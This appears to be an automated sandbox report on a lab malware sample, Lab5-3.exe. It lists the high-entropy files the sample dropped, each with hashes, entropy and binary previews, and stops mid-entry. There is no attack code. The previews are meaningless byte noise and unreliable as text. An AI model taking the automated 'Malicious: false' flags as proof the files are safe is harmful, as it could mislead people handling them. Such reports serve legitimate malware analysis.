                                                                                                          Preview:...D.......V5.T...O....#t.F..y.....c|.]...h..B..+.I..nS..k.rY......I.....Z.......:N.. <k`...y.-........DuA.....P.Mp.H..A....W..........h..P.;7.....q`.,..u}.d..../}gj.Z.....tLp..(........U...h..c.....?..f.D..7.....L,....Y..$...K.B9+.~...4.)U..Q}....>....D...m..........,:.,#?....1.....[..h|?p.3........h@..:.U0."..w%|..wY..e.G.....I<5. u...x.rJ...t.+X.P.A...?.b.Mf.d$l..[...f.WD..f .../h.......T...Jp=..*..,....Z..?dDY.>.v..D..........uS....V?n.;.A!JG./....K.\G..:.....a2.A..e......W.L..5...`...}.y.-&....._....=vg.#.m..[>.+.W......<..9,g.....L. i.<..}.o0..I-.....'].|.K!.[M .!.{..#?..?.o.f.Av..$.C..a..C.H.E........._V...(:....Y1..A.fl.....F....6.9......]/...zB..D..4f....Xr;C.K|._...8-...J.V...W.i2.......p.......~..'L......K.'W...4.........,C9.vQ....c .+z....2.s....L...%_.....T.f..q..R.L.P..*XN.......\l.f......,..--.......M...wJ.T..q.|.(y...m.{D.U....J.....c\&..q.6T.......G.6....+..;............mF.....Q....%.`.Gt6......&@....JU.Fw,....)v.b
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2656
                                                                                                          Entropy (8bit):7.940920274041843
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2fyydlm6Rh9QhXxP4npKk+exhl+fZKOQJOHHfUTid3hBaUoSGFcmeykEdEElU92i:bhXqOexhl8kNJOsGx0uKeY2ElUJ
                                                                                                          MD5:B5BEECB627E39890C57CDA3A9A82FB19
                                                                                                          SHA1:4FFDE6936724EE6A4A4C7E410682E57AC2012F9D
                                                                                                          SHA-256:E7BD7A1688E67E3B5763A2612255446B302527372D3BE8282C6E2432DD2AF35F
                                                                                                          SHA-512:55BADB54D3056BCCDDC9E4085D8DD1D1D6C3753446FE3CC7A486A7F6460F25A3851680698CFDE8B7F7DF1BEAAF67E00FA7064C3B4062C1AA720CC6668B039995
                                                                                                          Malicious:false
                                                                                                          Preview:.R.!..h..!...j..p.........p44.O..+.l.M..&...a.QTf..w..q.."0z......(1.\Sn+..P..y.B.8.w.&..aO5.Z........0..z.z..A.....2w].XH.....9r.l.|.a....m.....q...4...?~l!}......~.....&...}...`.......^...-.....m..'..q2.~z.R........Zv..2.<BL.g..f.o.J".....2.2Gl.......Yx...L~"....8..?R#*........ .....D...;E]..y.D...Z.w+..(......+@!yb./.7."..0Z....*g..|'...'R....Q.)%l..p.).`...B..Q\..GTp.3K.N...e+.x.d.1.....`.V....z'1...[.gX...x....cP.T.-K...^;..>X..4.............o...x...rU.6.<.._+..#....F.......j..1.).,....v..1!!Of#c....&..].x....{1...0O...F.g5.2/2=|..r.9...#..1.\.....i.C.G..^.u.....I}J.dS[I.e..HN.=.'... <.....r[..f.rh$c.u.t....eahfnU.=.0C.lc.,..P>.DbkIO...=@.R1oL....B...}....d.0..:Wy.w.....y?.H...2;D+.8V..`..-.Re.9.5..X.I.........>zK..D...rR...c...OBT...i,..2<zk.K.8~3B.9......._hh.x.<.\....s...yH.gj...t9=G..}"A..5.b..N......ln..YT..........{.|!.....WHl.w.6'....cs..M...~{2.2...R.7....p...,...Elt.|S..h...G..SZm.4rleT3......&*.ovv..6...../.>.a..#&.q....p...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.922814851162616
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:B/hOGDuEGvBmeC11uI7cfkP2LRTHfUTid3hBaUoSGFcmeykEdEElU92i:B/t9GJH3kPegGx0uKeY2ElUJ
                                                                                                          MD5:B887593499B73581E8BBECFE97B64B62
                                                                                                          SHA1:8577EFD4DC621A336458CA4CC1D13D1AB6EEDE4D
                                                                                                          SHA-256:11990A33E55432880D6BE44B6BFE2BFC5A206067915F56476A9C1411E9F95CEE
                                                                                                          SHA-512:021ABF54AE7E3797D29FBE92C5579CDA58B4A96A09A70CB75BB3D07DEB7E7F159FE2FDF640D9377FE88C5705D902ED3C50FCC7795AD9E351D7ED1428E9533E1E
                                                                                                          Malicious:false
                                                                                                          Preview:...{@F....|....]..+v....y..t"++...Q.......e..."....+;Ze...].B....v.a....G.c...Q..i.........e.37i.@W..o..Eh...y..1.SP...Q+..IF......+.k\..lJ'...%..&...o{-.......2.....~..0(..SP.e.W.O.Xs....$o.asJ..au.aY(...j.i.......{.+zD......=<...b..\.].n...Y.H..-3p...[......b.w.f.~.;.mq...P.g....H..|.....9.>-.H.+..i; .6.V..r...X...wu;B.a....3..?.....:a.Y.LY`v....x......ZY.....7...0.`l.....I..o...e...^.......W..Z.........bJ..}..`...6{..3...X..*.*..Z[.z..m.C..:....bmU.....0....n.d..g..(?......k...8*.Z..k>......&..........j..Y...?:...q.Q...$=1...d.^.$'O .;..3...2.PY..\9.'.GD..p...o~.....Ru..':|....{C\.!.o..Yn*.x._y...e..y.O.m.7.........\>.J.0..d'....;eI.:q.....1.1o.@..Sn..a.^..\......m.jG$.d.Dr .......u...:3...$...Bw.S....AaJ.H^O..r..Z!.0...w..8...7..aS2...YI..R.1jW..*.....o.*SC.../j8n.v.L.d...g....Jo.G...O<.I..-9.H..\.].E...V....tO..$I....eYl..}..+..n3...Vx.ZR..`x`.|c...G_....K2....J...*....Da..s5A?..)^........C.K..}.`{..Y.....p..IY..1."..}.b....K`r`.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.925120043715101
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:jdaw8ZoUEvjqX/ItromhZktqRMC/HfUTid3hBaUoSGFcmeykEdEElU92i:jsweoBv4/IRh+AqGx0uKeY2ElUJ
                                                                                                          MD5:511C4B077368E72236828929C5807F52
                                                                                                          SHA1:16E2B3A7D7DE6349072955E76DC8FFC5A7698AD0
                                                                                                          SHA-256:24088DE9FCA3A948617A84FA828F349587FA4777DC3DBD59F94837C3DB8CAB47
                                                                                                          SHA-512:53B927B17884BC0F62D079040041785A0E0057F536F95B877AC5BF44C0D402DE76F1A99903E2C5549526786ADCADF3F64EB68E1D09FDFD17F284DFC14791A97D
                                                                                                          Malicious:false
                                                                                                          Preview:...5...}z.F..!..........:....l...~._/...g.ud._......W......$...vE.-.?.ww..6%.&'.T.....0......c....cG...]..h`....|...%...I...J.z.....=r.x...k.75.....:.....m./y....T..>..Pb.....Z..D...:.d..........D.:#b.'Z..X......I..w..#;.5=.!C.......a..7rxt.<.....].ho@.....E..B..o.%...z.'../...!4^..d...k..=|5...$.....8.d.+].[.K.S.P......S...0......#.W....T....LX.K.....c..8~.....sMze.(u...8...|....,....$............1VL6..!......:Z&..Uw..........p.,....Q.=N.nQ.4%...o....._..K.P.q.e....B.@;'.M..L.J....Mi.o..c..F.......m.s?......;..&...4B...[.....%...6..}......B+ ...y..i.D.5.f...h....3.IZ.UqWVx.....(....J..?.f...v.v...KI.[...JiM.0..m..eO...C.......H...KV./Q(T..7m.jd4..b.~Hs..f.Vw..G...{p.W.Gx...$.\..(l..M5..^..w...b ...AL..'..'.6v..CO.U.gP$....^...Q.=D..+..[...=..E.K-j.L.(.r..$,....E...)`.CT!.U.|......Fr..i....8G.V.f......A)&.>..^........L...P...+.....c....'..:j.N...P#...<..l..Y'....=.MWT"...=',ogS..9....:L`...fd>.............(.Uyr..Y.).X.'..Bb
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2656
                                                                                                          Entropy (8bit):7.9331149985500975
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:3IHgcpFSvW3b2gMnW14LiO7QGmHfUTid3hBaUoSGFcmeykEdEElU92i:3ncyWLSajAJGx0uKeY2ElUJ
                                                                                                          MD5:CFE626A6B1D4457B8C7C2EE6D2BE0418
                                                                                                          SHA1:BE7ED73035FF81AC98F7AA674AA9110AE476CCA6
                                                                                                          SHA-256:D3EAA87EA0E76FBC17190A3CDD547A28F69204CEB61EB7B3CB4CF8A7FBCEFBA1
                                                                                                          SHA-512:A4074656F5A2F475E3A03C447F4B1426780A5F78EB48E931D7C5F8F32BA00F1B4F18777B861486082D24F8B0407F6069500157973824E2C075911096F0419B5D
                                                                                                          Malicious:false
                                                                                                          Preview:.....1. t.Z.bs...X.{O+..c...9:"...xX.....&...q.~.2.d....S.3.q.....{.(>....".......!.a.>......N..,p.5.......^....@..r#.R....0.(.S8.)&..`.,"...w........lx...}.\..e3w.......>fH.c;O.".~..r....f.(O...i...M..)BFj.......;8..1?.W..Z.,.....% .7..xde..-.{ ..s..O1.E..v.B.O9..9..w.^....;..O..2.4....u...PK.D|..b..Nt.&...wX...o....e.F.IBK.o..e.6.....|.p.....`..C)....z0...f%..BU..X...(...v.K.v..f..u..U....m....7.......A:....2*G.\$.7.D@:....<j..NE..%..rB...j..\...Q...`AA.t.[.1*w..{R._.....}s....0.".......b.......3..s...Pk3.k..j....#.).,".x....:*A.....d.Z..W..R...7..h.]..a.....O.,Df(.%.|......Dz...`g....._........DQ\.`s..8...v.;ng.<..!6..R.z.nh.z..V.S6.rDY:.I3.j...>..[...`.*.....oj.- Z./.*QTWkSi..G....j....!n_*".S....-+m+.N.PV..[..7..x......Y.D..q.!..HGx..b.)c....:..bp._9.l.N.M.L.v..OKCbL..*I..^R..X@.~5>F.......T../.j9m_.I.......2.-a..c.&#..]Z...+.....S.'..9..WM.......# z.C..rV...l.....p.m?.....M............z.JM.fn...~.....|[.5...Xe.........8o.. .
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.936766893920245
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:BR22bvxflFdEzgl7v1ZPdYp/V/NbUBtHfUTid3hBaUoSGFcmeykEdEElU92i:Dzbvx1EIZP6n/6BGGx0uKeY2ElUJ
                                                                                                          MD5:99820CECDF7C100ED6567F12DC524263
                                                                                                          SHA1:DD08C2B0E3D30C27741338C9BCCE103F9342E682
                                                                                                          SHA-256:F280ABF3E5B9F3EA7B1167F5B0F50FF42018928D6CE3013FE228BE4E6A7D4468
                                                                                                          SHA-512:AA0CEB8ADD5E27F0DDD9E1A5DD60C91DBD1786F4511755A172CD21DAE2808522E4C13649492A35302A49F4A430106B07BDB45D2E8CE770CF23773F7955E9CCB5
                                                                                                          Malicious:false
                                                                                                          Preview:h.}......'{;..+.n^o..4.....1.L...D;._..8...'.o.&..O.].G.$.S.....,.Og.M8.h.a.. ...A.....~7..m..T`_r..n...5&.~...l..`.j..."..;.....TT>...9.N {1...f...aG.[.{.0X.~.W.....T..2~..p.!0.......q{1w5.....U/.N.6W..9%.^.J..\..,...h............4..t.f.^.A4....=Kh.....v.....;.F>...'...b.h..}.........(..]..-.o.|.\..FC...J.....99......\....!6P7.I..'j...0V....#U..+......c......Q..C.....S...0..S...i.!l2.!E1.`..m..v...r....fn.vl.(.8..&6...%.{.Dw..0sF..]..{.........2.!8.N.'+.U.Z.2.3h..+h.K ..#Q.Z"a.Ns. ..1.#^..F.........Y.G.$~+...eB#.........b.x..z..h.&.S.wTR...3..m.<F_I.B..$yV...#D...(c(..e.]......2^...p-..4.f..C..tP..6..BA...u..Y#|..........?+....r...X.z]v....... ...c>.m.Xz.&.ir...(.]..Mkc.o.....%u.R.1.x....ul..B..& da~..{j.,.M5.."7.......9...uQA.T..../>..#.. .2...^I...V........8=..}.p.dC....|..G..h.;.._.S..j.2.S..rI`}...b.%e.3!...z9.......9..8#..ym...JC?..\....^..V.i.Jf......O17.gy.QX.gvZ....x$...?....?..c.......Y.....N*G.>Z...n.z:...kV..E......L..B...~
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.922395297383016
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:O8MAh/4wtGrUESz7f2SJwz79a9dAHfUTid3hBaUoSGFcmeykEdEElU92i:7MO/4wtA7Sz5eJa9dHGx0uKeY2ElUJ
                                                                                                          MD5:1323DE8E03A9058A6189687D1E0A36F0
                                                                                                          SHA1:0D5CC211C2FE8A6722A0A0C8837D3C47C497E0B6
                                                                                                          SHA-256:32BF7F6B0E36EBA23D9F344A8FB7BC5782AEF5D04EF592868E19440609266EA7
                                                                                                          SHA-512:F7F0A611705B4BBE4E1F3BD0457DB9B814EB5B050D09389CA4986C9A3A696A043BD091445A10962EC7AFCCD9AB6328EF61D9D589D2C4D70511AA6CFE57F1CB18
                                                                                                          Malicious:false
                                                                                                          Preview:..zl........oS..A.m..A.G...~...3f.{K.C.6f.....|......f......^.*...<x.....&.....2..O...n.B'..5.6.S.m.g.RN.F .\.\...$92.y..q7eW.~.!..b....}6....uj.J.{..y...J..p...x.8...}h.d...P..G.;..1......N.p(.G.hk\~.Dw"wx.x.ys.3.S.Kmv..=.|\Pk..{..R...!...Tj....n......>.....0-...O..../..@A)..+....Tr.>...........Jn)..TW(.f.F.V.A[.u.).e..~..P..'......v.......$..X8.-..M.....-.yic.P...Ma..72.`D.%.d.q.j..cl.v$..q=f.BD.K6.?.F.ki...X..3...".Ff.SNj.....L..>R..{Q._.{.jr.T...d.eW.g*...;|=..;.....E,..../i...u.5......@.%i.........A\..;-pY.KN.....'.YN..L...ms.....S-=..c..+..............D}......f...:..[n.^......2..S...7..x.....c..`...-.....68S..Iz...6..V.........rW..|XG.....4.(.G..KT..^..5sFg......;..d..a..cd{.jU.U....X.l.P.V.&..*....lS.F(..&..a6..=...n...._..9..8.h;+..oz....am...i.gn.,.X..Q.....p{... ../J... '...B6J..W.ze.....rU..nO.....;.......5...'1.0{..v..B(..X.a.p..%Mm^Fe@.V?....c.z.:c.....t.H.&.....s....4...<2.Y.......#.9..._.B..{...BQ....0s6.sY....(....t.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.931775218197825
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:DzIDf+0KObU4YsfugSQxST9UlwEU3QNIdFlsonHfUTid3hBaUoSGFcmeykEdEElk:GZKOb+XVcUUOPgNIdUoMGx0uKeY2ElUJ
                                                                                                          MD5:E23A6E5B6D79CA0948B3A6385D46B1C4
                                                                                                          SHA1:94668C1596FD86A017361838493211017DDC35FD
                                                                                                          SHA-256:103C7B4B6847565C5A7D33F3D42E45D83BE71C3963E99923C322C04BE6787849
                                                                                                          SHA-512:68AECF0476D4C4CEF50C04F2D02C677462C20FB7CC22F8827403DE0FC4C30E801B36419EB8B27AA233BB1AB7583FC8331C8D1800F4A10D820903AE623071B6B1
                                                                                                          Malicious:false
                                                                                                          Preview:.@.hu.$........G.Y..[2WS.'..S,.....}....<......}.{"..]..4..cf..b.e./.Gcyc4...7.$.W..dZ.....<.aW.u....\.8....^.G.;Lfv.,.#...q...ZG.7_..U...z...G.....g5)#.....:..0...lF`.S].8....".....v.....L.~.xg1......;..q.F0q"...$o...J.?....F.....-..q.`...e,..L)r.}..<...\.q...8+Tf......lN*.A4:........r...N...N..n..c..IH.)k..|.;...g........k.....2..,v;).>.-.$.O>...f.....5M.XC.y..d.B.o.#..........ik../j7./...&.I..n........._.zn'....M.....+tR.b.\...R.....].. +.v.~#.3N..e..gz.....+.U...v.@NA\..R....o.>K0...)....'..a.*K..0A......5V..p,S{..Iu...x`....p.....<.z0..2b.3.C..E..{M.1...gh*w......r.k..Kz..:..8..1Y..;....q3..."......K..*..?.Q[M|.....'...q.[&.....4....LXm..PM..w?".t.....l....B.W.N...#JH.&r..'3.....?4..[.t..4I3........i...W%(J.n..8..1%..v..<w...a.....;.K...CCc.w7.3. p...Hq.[T...[...y.X....O.k....! _.....9H+Bpl.4@%..^...\..<..{.....G..?.B.....H.]...KQ.....)..........v..w3...Fi..h.,m....+....T..h...?.Zf....W.t.b......p...e..5..|..Q...].E..3Lc.I...Bq=
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.937215998289881
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:F93osNENICCgA/F5FlvUG3abeU/puJWCWpZfuHfUTid3hBaUoSGFcmeykEdEElUJ:X7uICkPfviDQsBZfBGx0uKeY2ElUJ
                                                                                                          MD5:28DBA7BA1C53AC295B29F6D1C78D735D
                                                                                                          SHA1:66B80D6BB4631EA3110035C2A4B874CABAA70255
                                                                                                          SHA-256:D1BAE86C4297DF2FE6861D7A3714486AD213C65A6A648FFFF81E0BF97DE716ED
                                                                                                          SHA-512:78004B615B8B8805FDC4304B5A0DE33CA141E3FAFA42CEFB112F7086351C4E49B6AC784F8E8F8C1ABA609AEA530AF46DD6F5B170A484ADF45D87BA53E9856342
                                                                                                          Malicious:false
                                                                                                          Preview:a.=.U^....8{.X..5.....\.3......w.J..K.<.d)|a.1...*..s1J.....7.?.|..$.Xc..m........j....;BS..w9.*.6....N.=......wE|........c.q.L.'%'j....~..`.....V.5>....y....T.@....9.y"|.}. ..8..&.X.2I..ao.c.S....l?.;...7..,V...13........!..(...32.}.fF.A...x`......C.[..!*...m.....j}..^....eJ...ia.3.....H...1...!...UF..(.J.+.U.\D........'..Q-./(!.v.j.Y.<.V...:....^3.N.;*9.Ar..+..n..9XR.@....u^..Be7.ssdHeq......Z[U.`1......i.u.L..o:B..HO#dr..!t.S.......x">K..X.t.E.r%n..4..I.j..}..rOI*...c\K3o.j7...3h..OG.`.&}I....z.....v..D4...8......#....\.8..f.].'....H..:m[V..?..g.;`.......k.d.....6.NJ....>.?B........d...9M.S...W.v.-.z.$..o[..H..e...~..T...sHx....\.{.....-..`.91$NM.....h.mn"!...z\..iz..uDT.............Y.>.SW...T'.;...tZ....&v.G..:$.p}n.Z.........t....5...p../.J^.m.%/.j..l.I.M.?..%.*.tTu.xZ.....O.".S...Fx.b...W._h-)k...+BG..l.'kAx.=...m.....^..... y....B'......CL.....(}...|....]..o....9~m.y....1.......)....&.......:.4.dU.Y...O...&.=#...f?..%Ar.q.<_/.v.w..M.vJee..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.938396491550869
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6lkvNKNiPpSmvbu9ov5R3hDEo6xYBSzt+HfUTid3hBaUoSGFcmeykEdEElU92i:SYgNiPpb8ov53Eo6pPGx0uKeY2ElUJ
                                                                                                          MD5:09AA0024C53EE94518A0A01954260E9A
                                                                                                          SHA1:1C4BF963F62B2AAB6AD9259322453F400C37EFD1
                                                                                                          SHA-256:5B7B00F51F2CEE1C0FAF8C0185FDE289C33CBD4EC57194757457950897B3A117
                                                                                                          SHA-512:6C896E713D6FA45CA2224B901B421A5FC8727BA0C8963605B4F23A929679D79FA0D728EBDEFFEE4A51F84A800B73DA96A7F958E2F6BABEF9EF2D77CC71A52227
                                                                                                          Malicious:false
                                                                                                          Preview:.i.iN-.x..gb...Br.r-.o....Q.ri..5......?#0,...BD.^^...u/;.....v9v i...#.B......K `...././K...b.jfdT..~.1....4_.-e0.F1...LG...\.>%&...nLR.*.@.[......N..y.j...X..z.9OQ@.&.Q.^:.?..Xr.i.}...l..i..OF...{s....Znb...E...u+.S.....<.2....(.q...B........B)...f."...a ..m.......y..|o.....O.\?L..&..a.I...6....z.u......7.zPe........ ........a...8...oz.|Y..)&/..>......1...0.:z/&4..mc...v.Z.L.VB....T.(".=J....o...F...hD......84..".~..CA....@.z.Ho..q}h...g....._G..-c.V.....8Iu.nuo..3.B....b6...Cm........;...G.t0..W...o....A8R...._L.A)|.."..J"\....D.B..p.....I,......f...T....6..h.l.t..2.Mg+.0..U.......Pt...*d...d..\"..o.*.("e>.Y..K_.g2kF.J5&m........w?....0:=.>F|E..X1...D.}..u...2.L.|.,..o..._.9.M..3..u..w..7s...j...m..3E..Z.,O..i...{5...~...i.>d.jm7v...P.z..A.....d:9\...O.x2...b.w.{.L\5......X.[.6..4.o_$.....#. .P3.T..xw...h.....6*.^.5.....b5u...qj. #.37.hn..s<.86._.}s...n...D9M.D.....O.3...'..I..../8.. ....@Z.' ....6\.p.....>.p.....}u.*......*..8.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.940169582129266
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:FuAcTgfzFkYhA7ixqOlwx3AXdHfUTid3hBaUoSGFcmeykEdEElU92i:Fuf8fxXA7ix36AX2Gx0uKeY2ElUJ
                                                                                                          MD5:839E25ECC200CC06C9D51463308A84EE
                                                                                                          SHA1:60C5DEAA725838E9F294D480291267FB7AABA15C
                                                                                                          SHA-256:6B6841AF267E6CF719DCD8C564BCF6D6CF8886EEFAC889FC4854F1876BE2D5AF
                                                                                                          SHA-512:C36A558D36CAC1FD7AA2052F9CA73115BDFD8FE3350BD2520168188B614449947EE0A50E76BAFE4289A9510C0D5446ED299975FE224CFEA4C656D27172B69E60
                                                                                                          Malicious:false
                                                                                                          Preview:.1.|....qM..-.p..P[.?.v...5.;^.D.6..6w..*.;....kJM.G..h..N........0qs-...%.E......ta.)P.._...C.k..2..'.8..a...X.-_..j.sp..f'4..W.I4C..|8..Q13.7.v.b..x....... lO.,...u..........Z..D+....-.. .:wv......[qW$^...y...X>..av..?.s...yQ....b.M_R.JL.......-.>.........Q..n..O.R. ...Vt*./..8..2.w....{..v1..S).k(.i..{.F.JC.-...[..+....-P...h.zWr...%...........>6.P......A..o,..\.....#. .AB.....y...r&,..2.D..C._._-.[:../!..~.`.P.4..'.s.F..M..E\h.Bt?.....zI......e..,.4...{......|6..4..LZ.....S._..I...N.8......!.o.RI0..u2.Y.2.1......q.................V6.K..1m7...c..F.....&.uB...;.#%R.0.c................eJY...-f..<.<.......y.R..:.j.........=....9....|F.D.S..L.w==..n..d9......v98..NT..SB..q..t....<H;.../#...|.]".....J...v...{..?..s.k....y7.s...U..Y.....:9.\*......o.{p..wI\.."Eg.....%)1.U}......^3t..&.1....7Ay...k.......]....C...w0RG.'..@.6...r.LY....@...a...L.O.w.m....."^.d.9.....K.7.!.E.w.}n)P......-a...}K_.v(.}bR7.....EA..r..H..o_....qaz.L.=.o.+.e.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.928866523180809
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:W0DXxv39FCJ138HLUcLJxZfvHBlKm7sHfUTid3hBaUoSGFcmeykEdEElU92i:W+xv39F0wxLJxZnXK+rGx0uKeY2ElUJ
                                                                                                          MD5:824AC3C05606877A698FAC8527B128A1
                                                                                                          SHA1:C972A09658C09CC086591FAB041F3EED1F37DC47
                                                                                                          SHA-256:13F56D4741944708EC7ABD9AB3F7C3756FE7A76191D1B595FA291E403D51ED51
                                                                                                          SHA-512:C4638AF6DC060621B12D523725AC0693DCD79BB8B5524FBC3D1595686C02532EED9D05D9E5C5CC1487A65D018995F87B604C04DB1B5C2F0DCB812BC6CEE4F942
                                                                                                          Malicious:false
                                                                                                          Preview:.:....Y9.....pHe,.....2......m...U.&.Z!....HL_W/...0eyz....?.....d.....fxMz1F....s..i2e.....v.j...F..!k...b......a...6....a]...mW\.j.O.#...\..M1.@.L...?.m...*P{..2.......P.F.G.3.c....:....0.Ck.['7..p.....Y.#F.C..\v.?....T^P..f|..D.1...........Ad...n......m..5...J,.........N.Uj.......Z..b.....K=......q...X".|/;rg.P.....tJVg<Vg.......A. ..*...W.....`.Z..y.....1.....;....!...... .Q0.m.-}..{H...o..R..wii..H.......\V..A.NNG..w...A..K.v..\..M....g...Y..|c'.i....~...J.aOS.w...5....|I.t..vGd..U.`0zJy..0.CE..3]).7....:....f&..9.P.Z@yr7-..Hj.<.r..f\N..Xm.A.H.:.3PBaA.f..m. 5....E.``./...4.v.Vm.6..N....zl.......K. D.b....C........vx....mpw.:y..N.&....!!!K.p..S..*.E......Zt..}.......P......&+(.....)../.^.%.9.&l&....jf....}Aeam".{.....;. Y..!..b!...n..E..g;w....&..v.\.;XIm.......k..........BE.........{:..<.. {_.QY.....yp.l....dn.~4...~..}3Tl...~7....$'....EF........L.\i.mw .a.P,s,.....@.BF..b.^#.....?.bJnn.?.....k..-G..0^..-7....`...hT.y.....w...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2656
                                                                                                          Entropy (8bit):7.918239082594402
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:K7jZ+GerKx0mp9IPti6vE37ieajuImnZBmX4omHfUTid3hBaUoSGFcmeykEdEElk:MsprKdLyti6vG7inj5AMX4KGx0uKeY2b
                                                                                                          MD5:FE5B72C59CD45EA71C67777567265DE6
                                                                                                          SHA1:5DD8EC9FD6B5FD501FFB54A639081786A16716C6
                                                                                                          SHA-256:0E045293153B5A9FEF8DB81E97D15A870D2166D3EEC5D62612B21D68DCEF916D
                                                                                                          SHA-512:1837ECD748D5EC4DFBE15120FAC700CA893086A0F3309D6B8AF6C280E01D5A18C2EB2289ABD2199D94DD31ECFDF0C4F87323854D03CC4E773A267B4314BF9353
                                                                                                          Malicious:false
                                                                                                          Preview:A...Q;./!t_Uk(.K.2....k.....Sa.8.....p..?T..Hh..X^..a....-o. T{. D8.;Z...6a:.}.....2S..z.Xv.....KS0V^..M.D.H.^}$....>.H...e...v...}O.c.FU..@-..I........+.....c.pw.vD$b..;p6-...4..{.X6"]!.9]....l..:*.`..4S....&.O.;...j9.t._..@.......b.../.)...E:9.k.../..[....L...P.g.."+.u..}..+Fg...D.$[2.#.}..D..&..@...p..........$:.AP....`..MD....]........v ..1.c.<c.%#...N~.&.E.9.r}.s..4.=_..B......n...U.#...y../....."...m..20}.xD....:.l..y....(.^..y.....>...3."Z..z..Oi.+...x.E.....u.=.@s.........m.|...C.O=#+.2up.(.2..........3..u._!..HpU..K...#.>.....sx`.4qy..\..>..E.x.......$...o...`y.....o.G..P#....r....-Rk.i.I.7..'..O..)...bX.$.T..x../2....R>0.b_..o...._....O..\..r}.w.w.t. .^..Zy...^.....s'..pW..H..j....^..n].s.=G....2..................]..o9......a.}....@.E.q..un......>.!.K....D....F.d.....V.#l.2..9..R...D.A....L..&..h/.....P.v.N.4Q..K..r.}3S...3;..].o*..yE..=.I.R....9..O[l.*......D.tXS..$.....EM....E...J.R.H.>.._.R+.G...p.&.e.._.S.\.(.....Zs..^.y|n(/_F.h./p.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.931807588993399
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:WXtFHPdimxH3LMM6DCGqqI7iyJvjhrHfUTid3hBaUoSGFcmeykEdEElU92i:eFHPdimxH3L+ydic14Gx0uKeY2ElUJ
                                                                                                          MD5:E72CC1398E9CDD8408A9791DDCDB0F6F
                                                                                                          SHA1:0D8129C89BB6D9243C2D13BDA8542A191C693669
                                                                                                          SHA-256:B6A96ECDAC7912A68D3CD6D7265BAE215EB22011F5AAD139D49470C0C2A9D4F9
                                                                                                          SHA-512:C531772E4FA971CA62174008FD2E8A7B17F82124840F74B72AB4EED14A944366AFBE4150FFE8D77A56DF195AA455D8A2AEA8B5BDC81E42F59700E1A75D16ADDE
                                                                                                          Malicious:false
                                                                                                          Preview:`z...%.."...@.7e[..j.]V.s.P..M`[.....FJ.s..w..1.;....>F(..<..U.....-)..:.X.3rv..VR.....L...]......Q.D......,.&....8TM.<q.......(y#*/...5...5.(.:..W.0..hg..s.a.;g.g....G:....-.!*E..%..l.............?......d@.@.#S.......d&..7n...n.*@...%...7._...)>.K.U........^....B./QHQ.2%.s.Bd.p.%....(%w,.[H.5...5HcW...wX...&k.."@...S..^....&...|On..A1..=u.8..>..^M...i......7.C%..{.D4%:....a'+!..*..A......{`............%....K...D..w."GJW....^..K......E...;..}Aa...[n.FR...}hVO'.....Q.ow...C&....`...!......]..$5u.Re>.~...V...........N.l...]_....T....]......Xjr..4.c.P...g6...9.`5|.|o1....>...).p.].jY.. N2C...9...|dx.....55zv.r`...NI...,.`+..."..F..U.7..`L..ogvx...9..m]*.....;..iM0.'..}.....=...%y....^.o..5.k.....7.vm.^....f.U..K-..I'..`....Q.L.4%.\...8..:........&....q..K..)..\DVV2....%<wIZ..T.......P.....,b.k...X..p`.E...R...M..E.Tto....1......y.}..O...P..Y....J....`...QL....@....Yb........E...i....:cS?Yma.T.E].'._..3.Y...A...l..G......V^oK.>(.<.....#u6...Bp......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.9323551226476186
                                                                                                          Encrypted:false
